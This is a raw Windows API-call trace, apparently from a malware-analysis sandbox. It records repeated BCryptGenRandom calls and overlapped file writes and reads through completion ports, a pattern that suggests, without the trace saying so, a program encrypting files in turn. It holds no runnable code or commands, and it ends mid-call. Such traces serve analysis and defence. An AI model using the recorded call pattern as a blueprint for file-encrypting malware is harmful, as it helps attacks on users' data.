0x0 [0154.049] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.049] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.050] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.050] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.050] free (_Block=0x3e305b8) [0154.050] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.050] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.050] free (_Block=0x1fa91d0) [0154.050] free (_Block=0x1fa2ed8) [0154.050] free (_Block=0x1fa90b8) [0154.051] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.119] CloseHandle (hObject=0x308) returned 1 [0154.120] free (_Block=0x3df0008) [0154.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.135] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.135] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.135] free (_Block=0x3e305b8) [0154.135] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.135] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.136] free (_Block=0x1fa91d0) [0154.136] free (_Block=0x1fa2ed8) [0154.136] free (_Block=0x1fa90b8) [0154.136] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.138] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x11df0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.139] CloseHandle (hObject=0x2a8) returned 1 [0154.139] free (_Block=0x3df0008) [0154.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.151] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.151] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.151] free (_Block=0x3e305b8) [0154.151] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.151] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.151] free (_Block=0x1fa91d0) [0154.151] free (_Block=0x1fa2ed8) [0154.151] free (_Block=0x1fa90b8) [0154.151] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.153] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x94d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.164] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb5b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.193] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x31dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.194] CloseHandle (hObject=0x2a8) returned 1 [0154.194] free (_Block=0x3df0008) [0154.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.205] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.205] free (_Block=0x3e305b8) [0154.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.205] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.206] free (_Block=0x1fa91d0) [0154.206] free (_Block=0x1fa2ed8) [0154.206] free (_Block=0x1fa90b8) [0154.206] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.207] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.219] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2e88, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.220] CloseHandle (hObject=0x2a8) returned 1 [0154.220] free (_Block=0x3df0008) [0154.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.231] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.232] free (_Block=0x3e305b8) [0154.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.232] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.232] free (_Block=0x1fa91d0) [0154.232] free (_Block=0x1fa2ed8) [0154.232] free (_Block=0x1fa90b8) [0154.232] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.236] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.237] CloseHandle (hObject=0x2a8) returned 1 [0154.237] free (_Block=0x3df0008) [0154.237] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.248] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.248] free (_Block=0x3e305b8) [0154.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.248] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.249] free (_Block=0x1fa91d0) [0154.249] free (_Block=0x1fa2ed8) [0154.249] free (_Block=0x1fa90b8) [0154.249] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.250] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.372] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8166, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.380] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.380] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.380] free (_Block=0x3e305b8) [0154.380] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.381] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.381] free (_Block=0x1fa91d0) [0154.381] free (_Block=0x1fa2ed8) [0154.381] free (_Block=0x1fa90b8) [0154.381] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.404] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x388a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.612] CloseHandle (hObject=0x2a4) returned 1 [0154.612] free (_Block=0x1ff1e60) [0154.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.623] CloseHandle (hObject=0x3cc) returned 1 [0154.623] free (_Block=0x3d70450) [0154.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.638] CloseHandle (hObject=0x2a8) returned 1 [0154.638] free (_Block=0x3e70008) [0154.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.652] CloseHandle (hObject=0x308) returned 1 [0154.652] free (_Block=0x3ef0008) [0154.652] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.665] CloseHandle (hObject=0x338) returned 1 [0154.668] free (_Block=0x3df0008) [0154.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.672] CloseHandle (hObject=0x170) returned 1 [0154.672] free (_Block=0x3f70048) [0154.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.673] CloseHandle (hObject=0x3cc) returned 1 [0154.673] free (_Block=0x1ff1e60) [0154.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.674] CloseHandle (hObject=0x2a8) returned 1 [0154.674] free (_Block=0x3d70450) [0154.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.208] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0155.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0155.209] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.209] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.210] free (_Block=0x3e305b8) [0155.210] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.210] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.210] free (_Block=0x1fa91d0) [0155.210] free (_Block=0x1fa2ed8) [0155.210] free (_Block=0x1fa90b8) [0155.210] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0155.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0155.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0155.220] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.220] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.220] free (_Block=0x3e305b8) [0155.220] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.220] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.220] free (_Block=0x1fa91d0) [0155.220] free (_Block=0x1fa2ed8) [0155.220] free (_Block=0x1fa90b8) [0155.220] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.235] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0155.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.249] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8d86, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.254] CloseHandle (hObject=0x3cc) returned 1 [0155.254] free (_Block=0x1ff1e60) [0155.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.265] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0155.266] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 